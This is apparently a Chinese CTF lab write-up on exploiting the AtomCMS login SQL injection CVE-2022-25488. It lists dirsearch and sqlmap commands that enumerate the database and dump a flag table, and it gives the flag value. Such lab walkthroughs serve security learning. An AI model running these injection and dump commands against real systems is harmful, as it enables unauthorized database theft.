目录
一、题目:
题目介绍:

AtomCMS SQL注入漏洞
参考之前文章中介绍过的一个Atom官方漏洞,春秋云境:CVE-2022-25488,这个靶场在admin/login处存在注入。
二、进入题目:

1.目录扫描
dirsearch -u "http:// xxx.com"

找响应码是200的:

访问 /admin/login.php

burp抓包:

2.burp插件CO2:
可以用burp的CO2插件:

查库: --batch -dbs

查表: --batch -D "atomcms" -tables

查字段名: --batch -D "atomcms" -T "flag" -columns

查字段值: --batch -D "atomcms" -T "flag" -C "flag" --dump
flag{acf75740-b9f3-4171-81f1-4010602fd643}
3.Sqlmap
查库:
sqlmap -r q.txt --batch -dbs

查表:
sqlmap -r q.txt --batch -D "atomcms" -tables

查字段名:
sqlmap -r q.txt --batch -D "atomcms" -T "flag" -columns

查字段值:
sqlmap -r q.txt --batch -D "atomcms" -T "flag" -C "flag" --dump

flag{acf75740-b9f3-4171-81f1-4010602fd643}
&spm=1001.2101.3001.5002&articleId=131869864&d=1&t=3&u=723794dcf66f497aa97ee749cebeb9e6)
473

被折叠的 条评论
为什么被折叠?



